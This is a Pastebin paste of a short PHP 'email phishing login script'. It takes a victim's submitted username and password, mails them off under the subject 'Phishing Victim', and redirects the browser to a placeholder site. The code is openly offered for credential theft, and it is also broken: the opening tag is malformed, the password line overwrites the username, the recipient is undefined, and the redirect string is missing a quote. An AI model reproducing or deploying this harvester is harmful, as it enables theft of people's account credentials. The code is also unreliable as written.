CallingChain

[PHP] PHISHING SCRIPT

Jul 7th, 2015
1,151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.43 KB | None | 0 0
  1. ////////////////////////////////
  2. E M A I L
  3. P H I S H I N G
  4. L O G  I N
  5. S C R I P T  
  6. ////////////////////////////////
  7.  
  8. <php
  9.  
  10. if ($_POST['submit']) {
  11.  
  12. $message = "username: " .  $_POST['username'] . "\n";
  13. $message = "password: " .  $_POST['password'] . "\n";
  14.  
  15. mail($to, 'Phishing Victim', $message);
  16.  
  17. }
  18. ?>
  19. <script>location.href=http://your.yummy.site/loginshittyredirect.php';</script>
Advertisement
Add Comment
Please, Sign In to add comment